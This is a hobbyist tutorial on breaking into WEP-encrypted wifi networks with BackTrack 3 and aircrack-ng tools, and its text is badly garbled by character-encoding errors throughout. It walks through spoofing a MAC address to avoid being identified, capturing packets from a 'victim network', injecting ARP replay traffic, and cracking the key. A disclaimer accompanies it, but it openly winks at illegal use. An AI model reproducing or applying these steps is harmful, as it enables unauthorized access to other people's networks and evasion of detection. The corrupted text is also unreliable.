Hacking WEP wifi passwords

1. Getting the right tools

Download Backtrack 3. It can be found here:
http://www.remote-eploit.org/backtrack!download.html
"he Backtrack # beta is out but until it is full$ tested %especiall$ if $ou are a noob& I
would get the B"3 setup. "he rest of this guide will proceed assuming $ou downloaded
B"3. I downloaded the 'D iso and burned it to a cd. Insert $our B"3 cd/usb dri(e and
reboot $our computer into B"3. I alwa$s load into the 3rd boot option from the boot
menu. %)*+,/-D*& .ou onl$ ha(e a few seconds before it auto-boots into the 1st
option so be read$. "he 1st option boots too slowl$ or not at all so alwa$s boot from
the /nd or 3rd. *periment to see what works best for $ou.
/. 0reparing the (ictim network for attack
1nce in B"32 click the tin$ black bo in the lower left corner to load up a 3-onsole3
window. 4ow we must prep $our wireless card.
"$pe:
airmon-ng
.ou will see the name of $our wireless card. %mine is named 3ath53& 6rom here on out2
replace 3ath53 with the name of $our card.
4ow t$pe:
airmon-ng stop ath5
then t$pe:
ifconfig wifi5 down
then:
macchanger --mac 55:11://:33:##:77 wifi5
then:
airmon-ng start wifi5
8hat these steps did was to spoof %fake& $our mac address so that 9:+" I4 ',+*
$our computeris disco(ered b$ someone as $ou are breaking in2 the$ will not see $our
;*,< mac address. =o(ing on...
4ow it>s time to disco(er some networks to break into.
"$pe:
airodump-ng ath5
4ow $ou will see a list of wireless networks start to populate. +ome will ha(e a better
signal than others and it is a good idea to pick one that has a decent signal otherwise
it will take fore(er to crack or $ou ma$ not be able to crack it at all.
1nce $ou see the network that $ou want to crack2 do this:
hold down ctrl and tap c
"his will stop airodump from populating networks and will free?e the screen so that
$ou can see the info that $ou need.
@@4ow from here on out2 when I tell $ou to t$pe a command2 $ou need to replace
whate(er is in parenthesis with what I tell $ou to from $our screen. 6or eample: if i
sa$ to t$pe:
-c %channel&
then dont actuall$ t$pe in
-c %channel&
Instead2 replace that with whate(er the channel number is...so2 for eample $ou would
t$pe:
-c A
'an>t be much clearer than that...lets continue...
4ow find the network that $ou want to crack and =,-* +:;* that it sa$s the
encr$ption for that network is 8*0. If it sa$s 80, or an$ (ariation of 80, then
mo(e on...$ou can still crack 80, with backtrack and some other tools but it is a
whole other ball game and $ou need to master 8*0 first.
1nce $ou>(e decided on a network2 take note of its channel number and bssid. "he
bssid will look something like this --B 57:gk:35:fo:sC:/n
"he 'hannel number will be under a heading that sa$s 3'D3.
4ow2 in the same -onsole window2 t$pe:
airodump-ng -c %channel& -w %file name& --bssid %bssid& ath5
the 6I<* 4,=* can be whate(er $ou want. "his is simpl$ the place that airodump is
going to store the packets of info that $ou recei(e to later crack. .ou don>t e(en put
in an etension...Eust pick a random word that $ou will remember. I usuall$ make mine
3wepke$3 because I can alwa$s remember it.
@@+ide 4ote: if $ou crack more than one network in the same session2 $ou must ha(e
different file names for each one or it won>t work. I usuall$ Eust name them wepke$12
wepke$/2 etc.
1nce $ou t$ped in that last command2 the screen of airodump will change and start to
show $our computer gathering packets. .ou will also see a heading marked 3I)3 with a
number underneath it. "his stands for 3Initiali?ation )ector3 but in noob terms all
this means is 3packets of info that contain clues to the password.3 1nce $ou gain a
minimum of 72555 of these I)>s2 $ou can tr$ to crack the password.
I>(e cracked some right at 72555 and others ha(e taken o(er A52555. It Eust depends
on how long and difficult the$ made the password.
4ow $ou are thinking2 3I>m screwed because m$ I)>s are going up reall$ slowl$.3 8ell2
don>t worr$2 now we are going to trick the router into gi(ing us D:4D;*D+ of I)>s
per second.
3. ,ctuall$ cracking the 8*0 password
4ow lea(e this -onsole window up and running and open up a /nd -onsole window. In
this one t$pe:
airepla$-ng -1 5 -a %bssid& -h 55:11://:33:##:77 ath5
"his will generate a bunch of tet and then $ou will see a line where $our computer is
gathering a bunch of packets and waiting on ,;0 and ,'-. Don>t worr$ about what
these mean...Eust know that these are $our meal tickets. 4ow $ou Eust sit and wait.
1nce $our computer finall$ gathers an ,;0 reFuest2 it will send it back to the router
and begin to generate hundreds of ,;0 and ,'- per second. +ometimes this starts to
happen within seconds...sometimes $ou ha(e to wait up to a few minutes. 9ust be
patient. 8hen it finall$ does happen2 switch back to $our first -onsole window and
$ou should see the number underneath the I) starting to rise rapidl$. "his is greatG
It means $ou are almost finishedG 8hen this number reaches ," <*,+" 72555 then
$ou can start $our password crack. It will probabl$ take more than this but I alwa$s
start m$ password cracking at 72555 Eust in case the$ ha(e a reall$ weak password.
4ow $ou need to open up a 3rd and final -onsole window. "his will be where we
actuall$ crack the password. "$pe:
aircrack-ng -b %bssid& %filename&-51.cap
;emember the filename $ou made up earlierH =ine was 3wepke$3. Don>t put a space in
between it and -51.cap here. "$pe it as $ou see it. +o for me2 I would t$pe
wepke$-51.cap
1nce $ou ha(e done this $ou will see aircrack fire up and begin to crack the password.
t$picall$ $ou ha(e to wait for more like 152555 to /52555 I)>s before it will crack. If
this is the case2 aircrack will test what $ou>(e got so far and then it will sa$
something like 3not enough I)>s. ;etr$ at 152555.3 D14>" D1 ,4."DI4GG It will
sta$ running...it is Eust letting $ou know that it is on pause until more I)>s are
gathered. 1nce $ou pass the 152555 mark it will automaticall$ fire up again and tr$ to
crack it. If this fails it will sa$ 3not enough I)>s. ;etr$ at 172555.3 and so on until it
finall$ gets it.
If $ou do e(er$thing correctl$ up to this point2 before too long $ou will ha(e the
passwordG now if the password looks goof$2 dont worr$2 it will still work. some
passwords are sa(ed in ,+'II format2 in which case2 aircrack will show $ou eactl$
what characters the$ t$ped in for their password. +ometimes2 though2 the password
is sa(ed in D*I format in which case the computer will show $ou the D*I encr$ption
of the password. It doesn>t matter either wa$2 because $ou can t$pe in either one
and it will connect $ou to the network.
"ake note2 though2 that the password will alwa$s be displa$ed in aircrack with a colon
after e(er$ / characters. +o for instance if the password was 3secret32 it would be
displa$ed as:
se:cr:et
"his would ob(iousl$ be the ,+'II format. If it was a D*I encr$pted password that
was something like 356-8C#/J)63 then it would still displa$ as:
56:-8:C#:/J:)6
9ust omit the colons from the password2 boot back into whate(er operating s$stem
$ou use2 tr$ to connect to the network and t$pe in the password without the colons
and prestoG .ou are inG
It ma$ seem like a lot to deal with if $ou ha(e ne(er done it2 but after a few
successful attempts2 $ou will get (er$ Fuick with it. If I am near a 8*0 encr$pted
router with a good signal2 I can often crack the password in Eust a couple of minutes.
I am not responsible for what $ou do with this information. ,n$ malicious/illegal
acti(it$ that $ou do2 falls completel$ on $ou because...technicall$...this is Eust for $ou
to test the securit$ of $our own network. :-&
I will gladl$ answer an$ legitimate Fuestions an$one has to the best of m$ abilit$.
D18*)*;2 I 8I<< 41" ,4+8*; ,4.14* "D," I+ "11 <,K. "1 ;*,D "D*
8D1<* ":" ,4D 9:+" ,+-+ =* +1=* L:*+"I14 "D," I '<*,;<.
,4+8*;*D. 4o one wants to hold $our hand through this...read the tut and go
eperiment until $ou get it right.
"here are rare occasions where someone will use 8*0 encr$ption with +-, as well.
%+hared -e$ ,uthentication& If this is the case2 additional steps are needed to
associate with the router and therefore2 the steps I lined out here will not work. I>(e
onl$ seen this once or twice2 though2 so $ou probabl$ won>t run into it. If I get
moti(ated2 I ma$ throw up a tut on how to crack this in the future.